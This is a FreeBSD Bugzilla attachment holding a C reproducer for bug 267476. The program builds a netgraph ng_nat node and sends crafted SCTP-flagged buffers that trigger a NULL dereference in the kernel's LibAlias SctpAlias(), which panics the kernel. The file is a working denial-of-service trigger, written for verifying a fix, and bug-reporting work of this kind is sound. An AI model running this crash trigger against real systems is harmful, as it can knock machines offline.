FreeBSD Bugzilla – Attachment 237765 Details for
Bug 267476
SctpAlias() can pass a NULL assoc which ProcessSctpMsg() dereferences
trigger NULL dereference in kernel LibAlias's SctpAlias()
ng50a.c (text/plain), 1.88 KB, created by
Robert Morris
on 2022-10-31 17:33:25 UTC
Description:
trigger NULL dereference in kernel LibAlias's SctpAlias()
Creator:
Robert Morris
Created:
2022-10-31 17:33:25 UTC
Size:
1.88 KB
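/*
 * ng50a.c -- reproducer attached to FreeBSD bug 267476:
 * "SctpAlias() can pass a NULL assoc which ProcessSctpMsg() dereferences".
 *
 * The program builds a netgraph socket node with an ng_nat peer, names the
 * peer "nat0", gives it an alias address and then writes two 128-byte
 * buffers to the node's hooks.  On a kernel with the reported defect the
 * expected result is a kernel panic, so this belongs on a disposable test
 * machine only.  It needs enough privilege to load kernel modules.
 *
 * The defect itself is in the kernel (a missing NULL check on the
 * association before it is dereferenced); this file is only a regression
 * trigger for verifying a fix.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph.h>

int
main(void)
{
	signal(SIGPIPE, SIG_IGN);

	/*
	 * Best effort: kldload exits non-zero when a module is already
	 * loaded, so the results are deliberately not treated as fatal.
	 * NOTE(review): system() resolves these commands through PATH;
	 * run from a clean environment.
	 */
	system("kldload netgraph");
	system("kldload ng_socket");
	system("kldload ng_nat");

	/* Control (cs) and data (ds) sockets of a fresh netgraph socket node. */
	int cs = -1;
	int ds = -1;
	if (NgMkSockNode(NULL, &cs, &ds) < 0) {
		/* Without this check every later call would run on fd -1. */
		perror("NgMkSockNode");
		exit(1);
	}

	/* Create a "nat" node and attach its "out" hook to our "xout" hook. */
	struct ngm_mkpeer mkp;
	memset(&mkp, 0, sizeof(mkp));
	/* Short literals only; they fit the fixed-size message fields. */
	strcpy(mkp.type, "nat");
	strcpy(mkp.ourhook, "xout");
	strcpy(mkp.peerhook, "out");

	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
	    NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
		fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
		exit(1);
	}

	/* Attach the nat node's "in" hook to a second local hook, "xin". */
	struct ngm_connect con;
	memset(&con, 0, sizeof(con));
	strcpy(con.path, ".:xout");
	strcpy(con.ourhook, "xin");
	strcpy(con.peerhook, "in");

	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
	    NGM_CONNECT, &con, sizeof(con)) < 0) {
		fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook);
		exit(1);
	}

	/* Name the nat node so that ngctl can address it as "nat0:". */
	struct ngm_name name;
	memset(&name, 0, sizeof(name));
	strcpy(name.name, "nat0");
	if (NgSendMsg(cs, ".:xout", NGM_GENERIC_COOKIE,
	    NGM_NAME, &name, sizeof(name)) < 0) {
		perror("NgSendMsg NGM_NAME");
		exit(1);
	}

	if (system("ngctl msg nat0: setaliasaddr 5.5.5.5") != 0)
		fprintf(stderr, "warning: ngctl setaliasaddr did not succeed\n");

	{
		/*
		 * First buffer, written to "xout".  The two 8-byte words are
		 * stored in host byte order, exactly as the original pointer
		 * stores did; memcpy avoids writing a long long through a
		 * char array (aliasing/alignment undefined behaviour).
		 * On a little-endian host byte 0 is 0x40 and byte 9 is 0x84
		 * (132, the IP protocol number of SCTP).
		 * NOTE(review): presumably ng_nat parses this as an IPv4
		 * header -- confirm against ng_nat/libalias.
		 */
		static char buf[128];
		const long long word0 = 0x2000003c000040;
		const long long word1 = 0x8400;

		memset(buf, 0, sizeof(buf));
		memcpy(buf + 0, &word0, sizeof(word0));
		memcpy(buf + 8, &word1, sizeof(word1));
		if (NgSendData(ds, "xout", (unsigned char *)buf, sizeof(buf)) < 0)
			perror("NgSendData xout");
	}
	{
		/* Second buffer: 128 zero bytes written to "xin". */
		static char buf[128];

		memset(buf, 0, sizeof(buf));
		if (NgSendData(ds, "xin", (unsigned char *)buf, sizeof(buf)) < 0)
			perror("NgSendData xin");
	}

	return 0;
}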